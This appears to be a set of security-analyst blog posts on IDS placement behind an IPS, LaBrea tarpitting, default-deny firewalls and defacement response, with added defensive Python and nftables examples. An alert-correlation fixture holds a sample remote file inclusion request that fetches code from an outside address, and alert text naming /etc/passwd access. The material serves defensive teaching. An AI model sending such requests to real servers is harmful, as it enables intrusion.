Oh yeah, while having a light drink with my colleagues and discussing the current problems we face and the solutions required, one of my colleagues told a good story which IMHO lightened our mood for the day. The story goes like this.

He went for an interview for a Firewall Analyst position at one of the multinational companies here in Malaysia. During the interview, he was asked this question by one of the interviewers,

“Besides Snort, can you give another example of a sensor?”


One of my colleagues from the technical support department asked me about the best placement of the internal sensor (IDS) when the network also has an IPS implemented. So I gave him a simple diagram showing the usual placement of the internal sensor when an IPS is implemented as well.

The reasons why I would place my internal sensor (in this case the DMZ sensor) behind the IPS:

a). I have always believed that all preventive measures will be defeated sooner or later. If the DMZ sensor is placed in front of the IPS, what indication do we have when an attack bypasses the IPS?

b). If the sensor is placed in front of the IPS, how do we know whether one particular attack has been blocked by the IPS or not?

Usually for this kind of placement, good correlation between the alerts coming from the external IDS and the internal IDS helps the analyst determine whether the attack bypassed the preventive measures (firewalls and IPS). To strengthen the identification, both alerts are then compared against the logs retrieved from the targeted server.

As an example, let's say the external sensor produces an alert stating there is a remote file inclusion attempt on the web server. If the internal sensor produces the same alert, it means the attempt successfully bypassed the firewall (of course) and the IPS as well. Only then is the alert presented on the analyst console; if only the external sensor produces the alert, it can be discarded or not presented to the analyst console. It may still be kept for statistical purposes.

Another step: if the external and internal sensors produce the same alert, compare it against the web log obtained from the targeted web server. If the response code for that request is 200, the alerts are presented on the analyst console, else they are discarded. One caveat: a 200 only tells you the server processed the request, not that the inclusion actually worked, so treat it as a prioritisation signal rather than confirmation of compromise.

BUT then my colleague said

“That’s what I explained to them, but their question was: why does the internal sensor generate so few alerts compared to the external sensor?”

I told him, “That means their IPS has done a good job la!”

“Yeah, that’s what I thought, and I told them that, but they kept asking the same question.”

I’m out of words…
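The escalation logic from the post above, worked as an added example (it is not the author's code or any vendor's): an external-sensor alert reaches the analyst console only if the internal sensor behind the IPS raised the same signature for the same source and destination within a few seconds, and the target web server's access log shows that request answered with HTTP 200. The sensor names, SIDs, addresses and log lines are constructed for this demo; everything else is standard library.

```python
"""Alert-escalation logic from the post above, as an added example (not the
author's or any vendor's code): an external-sensor alert reaches the analyst
console only if (a) the internal sensor behind the IPS raised the same
signature for the same source/destination within a few seconds and (b) the
target web server's access log shows the request answered with HTTP 200.
The sensor names, SIDs, addresses and log lines are constructed for this demo."""
import re
from datetime import datetime, timedelta

# Constructed alerts, one per line: time|sensor|sid|src|dst|message
EXTERNAL_ALERTS = """\
2008-03-10 10:15:02|ext|1000001|203.0.113.5|192.0.2.10|WEB-PHP remote file include attempt
2008-03-10 10:15:09|ext|1000001|203.0.113.5|192.0.2.10|WEB-PHP remote file include attempt
2008-03-10 10:20:40|ext|1000002|198.51.100.7|192.0.2.10|WEB-MISC /etc/passwd access
2008-03-10 10:22:00|ext|1000003|198.51.100.7|192.0.2.10|WEB-CGI formmail access
"""
INTERNAL_ALERTS = """\
2008-03-10 10:15:03|dmz|1000001|203.0.113.5|192.0.2.10|WEB-PHP remote file include attempt
2008-03-10 10:22:00|dmz|1000003|198.51.100.7|192.0.2.10|WEB-CGI formmail access
"""
# Constructed Apache combined-format log from the targeted server. Requests the
# IPS dropped never reach the server, so they have no line here.
ACCESS_LOG = """\
203.0.113.5 - - [10/Mar/2008:10:15:02 +0800] "GET /index.php?page=http://203.0.113.5/c.txt HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Mar/2008:10:22:00 +0800] "GET /cgi-bin/formmail.pl HTTP/1.1" 404 210 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')


def parse_alerts(text):
    alerts = []
    for line in text.splitlines():
        ts, sensor, sid, src, dst, msg = line.split("|", 5)
        alerts.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "sensor": sensor,
                       "sid": int(sid), "src": src, "dst": dst, "msg": msg})
    return alerts


def parse_access_log(text):
    """Sensors and server are assumed to share one clock and time zone, so the
    offset in the log is ignored."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the pipeline
        ts = datetime.strptime(m.group("ts").split()[0], "%d/%b/%Y:%H:%M:%S")
        entries.append({"ts": ts, "ip": m.group("ip"), "req": m.group("req"),
                        "status": int(m.group("status"))})
    return entries


def correlate(external, internal, access, window=timedelta(seconds=5)):
    """Return (escalate, stats_only, failed_at_server)."""
    escalate, stats_only, failed = [], [], []
    for ext in external:
        twins = [i for i in internal
                 if (i["sid"], i["src"], i["dst"]) == (ext["sid"], ext["src"], ext["dst"])
                 and abs(i["ts"] - ext["ts"]) <= window]
        if not twins:
            stats_only.append(ext)   # stopped by firewall/IPS: count it, do not page anyone
            continue
        hits = [a for a in access
                if a["ip"] == ext["src"] and abs(a["ts"] - ext["ts"]) <= window]
        if any(a["status"] == 200 for a in hits):
            escalate.append({"alert": ext, "twin": twins[0], "requests": hits})
        else:
            failed.append(ext)       # reached the server but was not served a 200
    return escalate, stats_only, failed


def run():
    return correlate(parse_alerts(EXTERNAL_ALERTS), parse_alerts(INTERNAL_ALERTS),
                     parse_access_log(ACCESS_LOG))


if __name__ == "__main__":
    esc, stats, failed = run()
    for e in esc:
        print("ESCALATE", e["alert"]["msg"], "from", e["alert"]["src"], "->", e["requests"][0]["req"])
    print("stats only:", len(stats), "| failed at server:", len(failed))
```

On the constructed data, one RFI attempt is escalated, two external-only alerts are kept for statistics, and the formmail probe that both sensors saw is set aside because the server answered 404. The 200 is a weak success signal for RFI; the next thing to check is whether the web server itself made an outbound connection to the attacker's host to fetch the included file.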

When I fired up my Thunderbird this morning, I found an email from one of this blog's readers (sounds like I have many readers eh? No lah) inquiring about the requirements to get involved in the security field. From the content of the email I can tell the sender is a student, and it seems she has the interest and perhaps the attitude as well; hopefully she won't change her mind when she receives my reply.

Because the first requirement I pointed out to her is having the right attitude. Interest, passion and curiosity are a few of the characteristics that will help you progress. Well, some of our SAs here lack this kind of attitude (one of the areas I need to improve). Also the need for good, sound fundamentals, be it in networking, security or others. At least when you encounter these statements,

“Throttling: LaBrea accepts new connections but advertises a very small receiver window. The receiver window instructs the sender not to send more data per packet than the window allows. When throttling, connections still make progress, albeit slowly.

Persistent capture: LaBrea advertises a TCP receiver window size of 0 and instructs the sender to wait before sending more data. Periodically, the sender comes back and sends window probe packets to determine if the window has opened up again. This state can persist indefinitely.”

you will fully understand what these statements are trying to convey.

And yeah, that's what I've taken from the Virtual Honeypots book. It is about a low-interaction honeypot application called LaBrea. A low-interaction honeypot only simulates or emulates services, responses or applications, as this type of honeypot is not meant to represent a fully featured operating system. LaBrea introduces the tarpit concept: it tries to slow down spammers or worms by making the TCP connection very slow or completely stalling their progress. How? By the methods mentioned above, basically by manipulating the advertised window size. That's why it is important to have this kind of knowledge. For the time being this is my reading material while travelling on the LRT. One of the things I will definitely deploy (a honeypot or perhaps a honeynet).
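To make the two quoted behaviours concrete, here is an added example (written for this post, not LaBrea's own code) that parses an incoming TCP segment and crafts the reply whose advertised window does the work: a SYN/ACK with a tiny window for throttling, and a zero-window ACK that acknowledges nothing new for persistent capture. Only the TCP header is built and checksummed; putting it on the wire needs a raw socket and root, which is left out. The addresses, ports and the hash-derived ISN are assumptions made for the demo.

```python
"""The two LaBrea behaviours quoted above, modelled in Python as an added
example for this post (not LaBrea's own code): parse the incoming TCP segment
and craft the reply whose advertised window does the work. Only the TCP header
is built; sending it needs a raw socket and root and is left out. Addresses and
ports below are constructed."""
import hashlib
import socket
import struct

FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
THROTTLE_WINDOW = 10   # throttling: a few bytes per round trip, progress is a crawl
CAPTURE_WINDOW = 0     # persistent capture: sender must wait and keep probing


def tcp_checksum(src_ip, dst_ip, segment):
    """RFC 793 checksum over the IPv4 pseudo-header plus the segment."""
    pseudo = socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 6, len(segment))
    data = pseudo + segment
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_tcp(segment):
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", segment[:20])
    hlen = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x3F, "window": window, "payload": segment[hlen:]}


def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, window, payload=b""):
    hdr = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, window, 0, 0)
    csum = tcp_checksum(src_ip, dst_ip, hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def tarpit_isn(client_ip, server_ip, sport, dport):
    """Derive our ISN from the 4-tuple so no per-connection state is kept: every
    reply can be computed from the incoming packet alone (a simplification)."""
    digest = hashlib.sha256(f"{client_ip}:{sport}>{server_ip}:{dport}".encode()).digest()
    return struct.unpack("!I", digest[:4])[0]


def tarpit_reply(client_ip, server_ip, segment, mode="throttle"):
    """client_ip/server_ip are the incoming packet's src/dst. Returns the reply
    segment (directions swapped) or None for a RST."""
    p = parse_tcp(segment)
    isn = tarpit_isn(client_ip, server_ip, p["sport"], p["dport"])
    if p["flags"] & RST:
        return None
    if p["flags"] & SYN and not p["flags"] & ACK:
        # Accept the connection but advertise a tiny window from the start.
        return build_tcp(server_ip, client_ip, p["dport"], p["sport"], isn, p["seq"] + 1,
                         SYN | ACK, THROTTLE_WINDOW)
    if mode == "throttle":
        # Acknowledge the trickle that arrived; the sender may send THROTTLE_WINDOW more bytes.
        return build_tcp(server_ip, client_ip, p["dport"], p["sport"], isn + 1,
                         p["seq"] + len(p["payload"]), ACK, THROTTLE_WINDOW)
    # Persistent capture: acknowledge nothing new and advertise a zero window.
    # Data segments and window probes get this same answer for as long as the sender keeps trying.
    return build_tcp(server_ip, client_ip, p["dport"], p["sport"], isn + 1, p["seq"], ACK, CAPTURE_WINDOW)


if __name__ == "__main__":
    c, s = "203.0.113.9", "192.0.2.20"
    syn = build_tcp(c, s, 40000, 25, 1000, 0, SYN, 65535)
    synack = parse_tcp(tarpit_reply(c, s, syn))
    data = build_tcp(c, s, 40000, 25, 1001, synack["seq"] + 1, ACK | PSH, 65535, b"EHLO spam\r\n")
    for mode in ("throttle", "capture"):
        r = parse_tcp(tarpit_reply(c, s, data, mode))
        print(f"{mode}: ack={r['ack']} window={r['window']}")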

(image of the idiom, taken from successfromthenest.com)

Ahh, this idiom came to mind when one of my former colleagues told me that one of our competitors will not entertain any job application from our staff (especially for the security analyst post). Why? Because one of our former “analysts” joined their company a couple of years ago and they were quite surprised by her level of “knowledge”.

Surprised? Not me though. In fact, I expected this kind of situation to surface once these fellas went out applying for similar jobs at other companies. Well, they thought having the degree or certificates would guarantee them the job they applied for. Surprisingly (not so), some of them who have been working for a number of years as analysts still fail to grasp the proper tasks, knowledge and skills required of an analyst.

Bahh… enough mumbling. I think I do sound like a broken record. To be honest, I'm kinda fed up :P

Btw, before you start installing anything, please understand what these applications are meant to do.

Hmm.. I better keep my mouth shut now

Again, for this month (as for the past couple of months) I don't have the luxury of buying new books to read, so I just “kidnapped” a few papers printed by my boss for my own reading. Usually, besides “cuci mata” while travelling on the LRT, I spend most of the time reading. Actually those are the only times I have (besides during meals at home or while doing my “business” in the toilet).

For the time being I have just started reading a paper by Thomas H. Ptacek and Timothy N. Newsham of Secure Networks titled Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. And yes, the paper was published in January 1998. The purpose of reading it? Just to satisfy my curiosity and improve my own knowledge. It's a good paper; the concerns they raised were real and relevant at the time, and some of them still apply today.

Hopefully I can finish reading the paper today and start looking for other printed reading material in the office :)

(photo: dsc00238.JPG)
And no, Adam is not holding my reading material, and Ariff is not eating that article either. Those are my letters.

Is monitoring still relevant if they are going to implement an IPS?

That's one of the questions posed by my big Boss that really caught my attention (as usual my Big Boss always gives a series of good topics for our discussion, which I really appreciate. It gets my brain working and somehow I feel I gain something valuable from these discussions, even though they are via email).

So this is my reply.

Interesting question though. Of course, as one of the believers that Prevention Eventually Fails, I believe the existence of an IPS should never reduce the importance of detection. (Anyway, before it can prevent, it has to detect first ;)

Bejtlich says that prevention eventually fails because of the characteristics of intruders: they are unpredictable and some of them are smarter than the defender.
Marcus Ranum says that security is when people stop doing something stupid, and from his piece: “tell me what is so “deep” about knowing how to block 31 attacks?” Even though that article is more about DPI capabilities in firewalls, IMHO it applies equally to perimeter security devices that incorporate IPS functions.

And this is my thought:

Security is a process of reducing risk to an acceptable level. Risk is reduced by fulfilling the security process: assessment, protection, detection and response. Not long ago organizations used to say their network was secure when they had firewalls installed; then, when people realized that firewalls only deal with layers 2, 3 and 4, IDS was introduced as an early-warning detection system. And some smart guys thought “if we can detect, why not prevent the attacks as well?” Hence IPS was introduced to the market. IPS is more like giving those perimeter security devices a view of what is happening above layer 4, in the application payload. And of course IPS, like its predecessor IDS, relies on signature-based rules for known attacks for most of its detection and prevention. Whether the signature captures the exploit or the vulnerability is another issue.

Depending totally on these perimeter security devices (IPS/firewalls/proxy etc.) is not a wise idea. Why? How can you prevent attacks from unpredictable and smarter attackers? How do you prevent attacks targeting unpublished attack vectors and vulnerabilities?

OK, I can hear some of you arguing that in the case of 0-day attacks, even an IDS will fail to produce alerts. Now let's discuss a little bit about detection.

The detection process consists of collection, identification, validation and escalation. Let me focus on collection. There are reasons why having alert data, session data, statistical data and full content data is the ideal way of collecting network-based information to assist the analyst in identification. We must also be aware that collecting everything is ideal but problematic, BUT to quote from TaoSecurity:

“The advantage of collecting as much data as possible is the creation of options. Collecting full content data gives the ultimate set of options, like replaying traffic through an enhanced IDS signature set to discover previously overlooked incidents. Rich data collections provide material for testing people, policies, and products. Network-based data may provide the evidence to put a criminal behind bars.”

and

“NSM’s answer to the data collection issue is to not rely on a single tool to detect and escalate intrusions. While a protocol analyzer like Ethereal is well suited to interpret a dozen individual packets, it’s not the best tool to understand millions of packets. Turning to session data or statistics on the sorts of ports and addresses is a better way to identify suspicious activity.”

Let's imagine three scenarios:

Without IDS
An attacker uses a 0-day exploit for a 0-day vulnerability on a workstation. It bypasses the firewall, the attack pattern does not match any rule in the IPS and nothing is blocked. The victim complains, and all we can do is patch and move on. We never know what actually happened.

With IDS but without a proper collection process
An attacker uses a 0-day exploit for a 0-day vulnerability on a workstation. It bypasses the firewall, the attack pattern does not match any rule in the IPS so nothing is blocked, the attack pattern does not match any rule in the IDS and no alert is triggered. The victim complains, and all we can do is patch and move on. We never know what actually happened.

With IDS and a proper collection process
An attacker uses a 0-day exploit for a 0-day vulnerability on a workstation. It bypasses the firewall, the attack pattern does not match any rule in the IPS so nothing is blocked, and the attack pattern does not match any rule in the IDS so no alert is triggered. The victim complains, and we can start investigating with the available data. We update the signatures and perhaps feed them to the IPS and IDS, and the information gathered can be used for legal purposes.

The detection engine is perhaps the main component of an IDS. Its alerts are the main indicators of suspicious events that have occurred (compromise), are ongoing (exploitation) or are about to happen (vulnerability scanning), depending on the phase of compromise. For an analyst to perform identification (to categorize the suspicious event as normal or malicious) he needs all available resources and information to support his analysis. The main problem with IDS is the false positive rate. The only way to reduce it is to fine-tune our rules to suit the client's environment, and of course that requires the client's inventory list covering the assets we monitor. It is easier to defend or monitor something you know and are aware of.

I never said we should abandon IPS or any other preventive measure. As I stated before, security is about reducing the risk of being compromised, so we have to incorporate every security measure that may deter potential intruders from launching or continuing their attacks. I don't believe in depending on one security product or one security measure: anyone who believes his network is secure because of such and such products implemented in it is managing his security by belief and not by facts, which in the end will fail spectacularly.

And of course: why does a building with biometric access doors, access cards and security guards still need CCTV?

Quite long eh? Anyway, I would be grateful if any of you have other opinions on this matter.

p/s: I've censored any sensitive/confidential statements though ;)

OK, I know it's an old article, originally written for certifiedsecuritypro.com, but the content is still relevant. To be honest I had a good laugh reading it. How true it is.

First of all, yeah, the idea of “Default Permit” is really dumb. The favourite situation is when deciding the firewall policy or rules. I am always asked the question “For firewall rules or policy, should we allow first then deny, or the other way around?”

I think MJR's (Marcus J. Ranum) explanation should answer this question (and I intend to use it in my training class soon). His explanation of the issue:

Back in the very early days of computer security, network managers would set up an internet connection and decide to secure it by turning off incoming telnet, incoming rlogin, and incoming FTP. Everything else was allowed through, hence the name “Default Permit.” This put the security practitioner in an endless arms-race with the hackers. Suppose a new vulnerability is found in a service that is not blocked – now the administrators need to decide whether to deny it or not, hopefully, before they got hacked.

It's like a building with 65535 doors: how do you secure it? By telling visitors they can use any door except a few, or by telling them they can NOT enter the building except through a few designated doors?

Secondly, Enumerating Badness. This is about the time wasted identifying and listing attack patterns, traffic or attack vectors instead of identifying and tracking the applications and normal traffic running in the network, or keeping track of what should be running on our systems. In other words, just allow the good traffic or applications and deny everything else. “Default Deny” should be implemented instead of “Default Permit”.
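What the two policies look like on a real packet filter, as an added example for this post (not from MJR's article): an nftables ruleset whose chains have `policy drop`, so a newly exposed service is unreachable until someone deliberately adds its port to the allowed set. The "Default Permit" shape is shown in the comment for contrast. The allowed ports are assumptions.

```nft
# Added example: "Default Deny" on Linux nftables. Load with: nft -f default-deny.nft
#
# The "Default Permit" shape MJR describes would be the opposite and is NOT what
# is loaded here:
#     chain input { type filter hook input priority 0; policy accept;
#                   tcp dport { 21, 23, 513 } drop }      # block the known-bad few
# Every other port, including the one with tomorrow's vulnerability, stays open.
flush ruleset
table inet filter {
    set allowed_tcp {
        type inet_service
        elements = { 22, 80, 443 }     # the designated doors (assumed for this host)
    }
    chain input {
        type filter hook input priority 0; policy drop;
        iif "lo" accept
        ct state established,related accept
        ct state invalid drop
        ip protocol icmp icmp type { echo-request, destination-unreachable, time-exceeded } accept
        ip6 nexthdr icmpv6 icmpv6 type { echo-request, nd-neighbor-solicit, nd-neighbor-advert, nd-router-advert } accept
        tcp dport @allowed_tcp ct state new accept
        # Anything reaching here is dropped by the chain policy; log a sample so
        # the sensor and the analyst see what the policy is refusing.
        limit rate 10/second log prefix "default-deny: " drop
    }
    chain forward {
        type filter hook forward priority 0; policy drop;
    }
    chain output {
        type filter hook output priority 0; policy accept;
    }
}
```

Exposing a new service means adding one element to `allowed_tcp`, which is a deliberate, reviewable change; nothing becomes reachable by accident.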

To quote MJR again;

Why is “Enumerating Badness” a dumb idea? It’s a dumb idea because sometime around 1992 the amount of Badness in the Internet began to vastly outweigh the amount of Goodness. For every harmless, legitimate, application, there are dozens or hundreds of pieces of malware, worm tests, exploits, or viral code. Examine a typical antivirus package and you’ll see it knows about 75,000+ viruses that might infect your machine. Compare that to the legitimate 30 or so apps that I’ve installed on my machine, and you can see it’s rather dumb to try to track 75,000 pieces of Badness when even a simpleton could track 30 pieces of Goodness.

And the third is about the need for secure application design or frameworks instead of implementing first and managing the bugs/flaws later :D

Well I think you should read it yourself. ;)

One of my favourite sites nowadays is http://security.org.my, which recently published a series of defacements of .gov-related sites reported by users. Surprisingly, a few websites have been re-defaced from time to time and sadly the response from the affected parties is either minimal or non-existent.

One commenter on the defacement posting said that

” I think the country still can survive even if Majlis Daerah Kinta Barat or Majlis Perbandaran Manjung got defaced”

I do agree with the statement. Yes, the country will survive this kind of attack on our government-related sites, but let me point out a few things.

For me, a defacement is an attack that leaves a trace like a blinking neon light in the middle of the desert at night. We can determine the attacker's final intention in executing his attack. It is easier to trace, as most of these attacks exploit web application flaws and vulnerabilities which most of the time are logged either by the web server or by the IDS. And of course, you obviously know the defaced website has been compromised. Most of the time the attackers are script kiddies who stumbled upon a few scripts, or beginners in web attacks. It's just like when you use nikto/nessus to launch a web vulnerability scan: it DOES produce a huge number of alerts, for snort at least.

But again, I wonder why the response is either too slow or non-existent, and in the case of re-defacement, has the administrator taken any action to prevent the incident from recurring? Most of the time the action is just restoring the web page(s). But do they identify why the defacement occurred? Did they assess their assets, applications and platform? Did they do their patch management accordingly? I guess there are many questions they need to answer.
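One small piece of the response the post is asking for, as an added example (not code from security.org.my or any of the administrators mentioned): baseline the web root with SHA-256 and report what changed on each run, so a re-defacement is noticed by the owner before it is reported by a visitor, and a dropped web shell shows up as an added file rather than going unnoticed behind a restored index page. The web root and baseline file paths are assumptions.

```python
"""Part of the response this post asks for, as an added example (not code from
security.org.my or any administrator mentioned): baseline a web root with
SHA-256 and report what changed, so a re-defacement is noticed by the owner
before it is reported by a visitor. The web root and baseline paths are assumptions."""
import hashlib
import json
import os
import sys


def hash_tree(root):
    """Relative path -> sha256 for every regular file under root. Symlinks are
    skipped so a planted link cannot redirect the check outside the web root."""
    digests = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if not os.path.islink(os.path.join(dirpath, d)))
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(full, root)] = h.hexdigest()
    return digests


def save_baseline(digests, path):
    with open(path, "w") as f:
        json.dump(digests, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def compare(baseline, current):
    """Three lists an administrator can act on: dropped web shells show up under
    'added', the defaced page under 'modified', deleted content under 'removed'."""
    return {"added": sorted(set(current) - set(baseline)),
            "removed": sorted(set(baseline) - set(current)),
            "modified": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])}


def check(root, baseline_path):
    return compare(load_baseline(baseline_path), hash_tree(root))


if __name__ == "__main__":
    # usage: integrity.py init|check <webroot> <baseline.json>   (names are assumptions)
    cmd, root, base = sys.argv[1:4]
    if cmd == "init":
        save_baseline(hash_tree(root), base)
    else:
        report = check(root, base)
        for kind, paths in report.items():
            for p in paths:
                print(kind.upper(), p)
        sys.exit(1 if any(report.values()) else 0)
```

Keep the baseline off the web server (or at least somewhere the web server's account cannot write): an attacker who can overwrite index.html can usually overwrite a baseline sitting next to it. The baseline also has to be refreshed as part of every legitimate deployment, otherwise the check drowns in expected changes and gets switched off.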

My concern is not the defacement itself but the response. If they fail to react or respond accordingly to these annoying (in my view) attacks, let me give one scenario that should put enough ph34r in those administrators' hearts.

Imagine an attacker who has the knowledge, the skills, the tools and the motivation to launch his attack, adhering to the intrusion maxim “minimize signal, maximize access and maximize damage”. His exploits are custom-made tools for an unpublished vulnerability he identified in the victim's web application (0-day). His attack traffic is crafted to look like normal traffic on the network, and of course these 0-day attacks bypass the firewall and the IPS and even avoid triggering IDS alerts. Or worse, he creates an encrypted channel to communicate with the compromised machine over ports that appear normal. His final intention? To steal data.

If our .gov administrators fail to respond appropriately to web defacement attacks, just imagine what kind of response they will give to the attack I've described above. I bet the response is none ;)

Am I concerned? No, I am not concerned... I am freaking worried.